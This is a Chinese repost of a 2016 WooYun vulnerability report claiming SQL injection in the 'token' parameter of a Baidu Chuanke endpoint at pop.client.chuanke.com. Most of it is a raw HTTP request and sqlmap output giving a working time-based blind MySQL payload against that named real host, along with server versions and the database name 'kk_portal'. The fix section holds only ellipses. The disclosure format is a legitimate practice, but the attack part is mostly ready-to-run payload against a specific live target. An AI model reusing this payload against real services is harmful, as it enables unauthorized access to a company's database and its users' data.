记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

百度传课某处存在SQL注入

2016-05-29 03:00

注入点

注入参数 token

code 区域
GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1

Host: pop.client.chuanke.com

Accept-Language: zh-cn

Connection: keep-alive

Accept: */*

User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0

Host: pop.client.chuanke.com

Pragma: no-cache

Content-Type: text/html

DontTrackMeHere: gzip, deflate



漏洞证明:

屏幕快照 2016-04-13 19.57.11.png

code 区域
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

---

Parameter: #1* (URI)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS

---

web application technology: PHP 5.3.13

back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS

---

web application technology: PHP 5.3.13

back-end DBMS: MySQL >= 5.0.0

current database: 'kk_portal'

修复方案:

。。。


知识来源: www.wooyun.org/bugs/wooyun-2016-0195952

阅读:107807 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“百度传课某处存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云